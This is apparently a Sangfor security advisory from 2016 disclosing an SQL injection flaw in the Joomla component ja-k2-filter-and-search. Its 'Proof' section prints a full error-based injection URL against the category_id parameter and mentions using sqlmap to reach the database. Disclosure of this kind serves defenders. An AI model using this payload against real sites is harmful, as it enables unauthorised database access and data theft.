SQL Injection Vulnerability in Joomla Component ja-k2-filter-and-search was Discovered

24/10/2016 10:10:12


Summary

In the past couple of days, Information Security experts discovered an SQL injection vulnerability in Joomla component ja-k2-filter-and-search.

This component has been used in various Joomla sites. Through the use of the sqlmap tool, an attacker can gain access to the website database and reveal very critical or sensitive data.

This vulnerability has not been detected or published in any international website. In addition, the component developer has not been informed about this critical issue. Therefore this vulnerability is considered as a zero-day vulnerability.

Joomla is a popular open-source Content Management System (CMS). It is written in PHP and uses MySQL database to store contents. It can run on a wide variety of platforms such as Linux, Windows, Mac OS X server and so on.

Analysis

Proof

This vulnerability can be checked for a website that uses the Joomla component Ja-K2-Filter-And-Search by using a specific query.

Type the following link to the address bar of the web browser:

http://www.xxx.com/index.php?category_id=(select 1 and row(1,1)>(select

count(*),concat(concat(CHAR(52),CHAR(67),CHAR(117),CHAR(117),

CHAR(82),CHAR(57),CHAR(71),CHAR(65),CHAR(77),CHAR(98),CHAR(77)),

floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))&

Itemid=135&option=com_jak2filter&searchword=the&view=itemlist&xf_2=5'

If an error occurs as follows, the vulnerability exists:   


Solution

Since no patch has been released by Joomla. Website developers should keep a close eye on the updates at Joomla official website and wait for the patch. For Sangfor NGAF customers, be rest assured that the vulnerability in the websites is well protected.




Our Social Networks

Global Service Center:

COPYRIGHT © 2000-2017 SANGFOR TECHNOLOGIES CO., LTD. ALL RIGHTS RESERVED.